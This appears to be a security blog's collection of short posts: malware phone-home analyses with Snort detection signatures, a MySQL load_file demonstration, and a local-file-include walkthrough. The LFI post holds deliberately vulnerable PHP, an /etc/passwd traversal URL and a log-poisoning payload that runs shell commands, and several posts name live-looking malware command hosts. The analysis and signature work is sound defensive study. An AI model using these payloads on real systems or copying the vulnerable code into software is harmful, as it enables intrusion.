koko.exe Phone Home

koko.exe does a GET request to 193.242.108.49:

GET /Dialer_Min/number.asp HTTP/1.1
Accept: */* Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 193.242.108.49
Connection: Keep-Alive

The server replies with a text file (a.b.c.d == my IP):

003727091384
US
a.b.c.d
1.8
test disclaimer

The URL and first line of the reply point to a phone number, so I polled the server to see how many phone numbers come back:

dennis@ipa:~$ for i in `seq 1 1 500`; do
> lynx -source http://193.242.108.49/Dialer_Min/number.asp | head -1 >> numbers
> done
dennis@ipa:~$ cat numbers | sort | uniq -c | sort -nr
73 0023222279883
61 01137165159890
54 01137091022348
50 01137165159892
50 003727091384
49 011239200167
47 00239200167
46 01123222279883
44 0037165159892
26 011438209216455

The phone numbers break down like this:

011438209216455
011 - US (International Direct Dialling)
43 - Austria (Country Calling Code)
820 - services with regulated max. tariffs
9216455

01137165159892
0037165159892
011/00 - US/Generic
371 - Latvia
651 - landlines for district of Aizkraukle
59892

01137165159890
011 - US
371 - Latvia
651 - landlines for district of Aizkraukle
59890

01137091022348
011 - US
370 - Lithuania
910 - premium rate numbers
22 348

011239200167
00239200167
011/00 - US/Generic
239 - Sao Tome and Principe
239200167 - couldn't track down a source on phone number format

01123222279883
0023222279883
011/00 - US/Generic
232 - Sierra Leone
22279883 - couldn't track down a source on phone number format

003727091384
00 - Generic
372 - Estonia
709 - landline
1384

References:

Virustotal
ThreatExpert
CWSandbox

Daily Commute

Snort Signature Practice: Setup_2022.exe

Setup_2022.exe resolves greatnorthwill.com (91.213.121.52) and calls home via a GET request:

GET /?mod=vv&i=1&id=2022 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: greatnorthwill.com
Cache-Control: no-cache

For the signature I used the parameter names and the User-Agent string:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"Setup_2022.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?mod="; uricontent:"&i="; uricontent:"&id="; content:"User-Agent\: Mozilla|0D 0A|"; sid:012220101;)

"mod" and "i" stayed static on the test runs.

References:

Virustotal
ThreatExpert

MySQL's load_file Function

I didn't know about this function till I read http://praetorianprefect.com/archives/2009/12/unu-cracks-a-wall-street-journal-conference-site-not-wsj-com/.

dennis@ipa:~$ mysql -u root -h 192.168.1.102
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 17
Server version: 5.0.77-log OpenBSD port: mysql-server-5.0.77

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select load_file("/tmp/dennis")\G
*************************** 1. row ***************************
load_file("/tmp/dennis"): i'm a file on 192.168.1.102

1 row in set (0.00 sec)

Pending the usual file permissions and MySQL File privileges, you can read a file located on the database server.

Reference:

http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_load-file

Local File Include Code Execution

Based on http://eng.xakep.ru/link/50643/, I created a demo app to play with this. The vulnerable PHP code looks like:

<?php

$file = $_GET['id'];
echo $file;

if (file_exists($file))
include $file;

?>

The following URL demostrates a local file include:

http://192.168.1.102/animals/animals.php?id=../../../../etc/passwd

An attacker can control various parts of the web server log that he generates. For example the -U flag to wget sets a custom User-Agent header:

wget -U "<?php system('touch /tmp/dennis'); ?>" 192.168.1.102

And it generates the following Apache access_log entry:

192.168.1.102 - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"

If we request the following URL:

http://192.168.1.102/animals/animals.php?id=../../../../var/www/logs/access_log *

* the path to Apache's access_log varies per configuration.

animals.php's include statement includes the access_log which happens to have a log entry with a User-Agent set to a snippet of attacker controlled PHP code:

dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis

Snort Signature Practice: A-Install-815416_2009-1939.exe

A-Install-815416_2009-1939.exe pops up an error window, phones home to needforspeedeu.com (91.213.121.52) and also tries resolving thebigben.cn:

GET /?act=fb&1=1&2=1262237847&3=5.1.2.0.2600&4=IEXPLORE.EXE&5=18&6=4&7=127&8=19&9=0&10=2009-1939 HTTP/1.1
Accept: */*
User-Agent: Mozilla
Host: needforspeedeu.com
Cache-Control: no-cache

After comparing a few captures, the parameters change like this:

act=fb (same)
1=1 (same)
2= up to 10 digits (diff)
3=5.1.x.0 (diff)
4=IEXPLORE.EXE (same)
5= 2 digits (diff)
6= 1 digit (diff)
7= up to 3 digits (diff)
8= up to 3 digits (diff)
9=0 (same)
10= possible timestamp (diff)

My first signature tries to match the particulars of the parameters with a pcre:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/?act=fb&1=1"; pcre:"/&2=[0-9]{1,10}&3=5\.1\.[0-9]\.0\.2600&4=IEXPLORE\.EXE&5=[0-9]{2}&6=[0-9]&7=[0-9]{1,3}&8=[0-9]{1,3}&9=0&10=/"; sid:123120092;)

This didn't feel like a clean signature so I simplified it to:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"A-Install-815416_2009-1939.exe malware (simplified)"; flow:to_server; content:"GET"; http_method; uricontent:"/?act="; uricontent:"&1="; uricontent:"&2="; uricontent:"&3="; uricontent:"&4="; uricontent:"&5="; uricontent:"&6="; uricontent:"&7="; uricontent:"&8="; uricontent:"&9="; uricontent:"&10="; sid:010220101;)

References:

Virustotal
CWSandbox
ThreatExpert

Snort Signature Practice: spyeraser096.exe

spyeraser096.exe is one of those fake anti-virus malwares. It does a GET request to spyeraser.ir (193.104.110.81):

GET /statav.php?wmid=3&name=a0331bb5faf7707f HTTP/1.1
Host: spyeraser.ir

I used the file and parameter names for the signature:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"spyeraser096.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/statav.php?wmid="; uricontent:"&name="; sid:010120101;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: n-bss.exe

n-bss.exe does a GET phone home to gateshis.cn (91.213.174.9) then tries to download another n-bss.exe binary from blogcz.cn (not resolving):

GET /knock.php?id=SYSTEM!WINXP!B857B9C9 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: gateshis.cn
Connection: Keep-Alive

knock.php's id parameter is delimited by "!". "SYSTEM" remained consistent on my packet captures--user name of the process? The next field is the computer's name. I'm not sure about the last field:

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"n-bss.exe malware"; flow:to_server; content:"GET"; http_method; uricontent:"/knock.php?id="; pcre:"/id=SYSTEM!.*!/"; sid:123120091;)

References:

Virustotal
ThreatExpert

Snort Signature Practice: logo.exe

logo.exe POSTs a base64 encoded file to gator.php on yourclicker.cn (124.217.251.182). It also resolves ya.ru (77.88.21.8, 213.180.204.8, 93.158.134.8), but I never saw any traffic to these IPs:

POST /gator.php HTTP/1.0
Host: yourclicker.cn
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 3088

a=&b=&d=&c=UDNNTAAAAAA/BwAAEQAAAAAAAAAIAAAAIyw9LCyblXsSAAAAAAAAABAAAADZBwwABAAfABcA
AgAiAPkBEwAAAAAAAACkAAAApAAAAAMAAAA1NTI3NC02NDEtMjM4Mjk1Ni0yMzg0NAAuAAAA
...more base64

I based the signature on the file name and POST parameter names--the out of order d and c parameters felt unique.

alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"logo.exe malware"; flow:to_server; content:"POST"; http_method; uricontent:"/gator.php"; content:"a="; content:"&b="; content:"&d="; content:"&c="; sid:123120093;)

References:

Virustotal
ThreatExpert